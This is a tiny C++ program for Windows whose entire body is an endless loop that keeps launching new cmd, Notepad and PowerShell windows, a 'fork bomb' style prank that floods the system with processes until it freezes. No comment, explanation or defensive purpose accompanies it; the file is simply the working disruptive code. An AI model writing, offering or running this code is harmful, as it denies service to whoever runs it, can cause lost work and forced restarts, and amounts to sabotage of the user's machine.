#include<windows.h>

using namespace std;

int main(){

for(;;){

system("start cmd");

system("start notepad"); 

system("start powershell"); 

}

}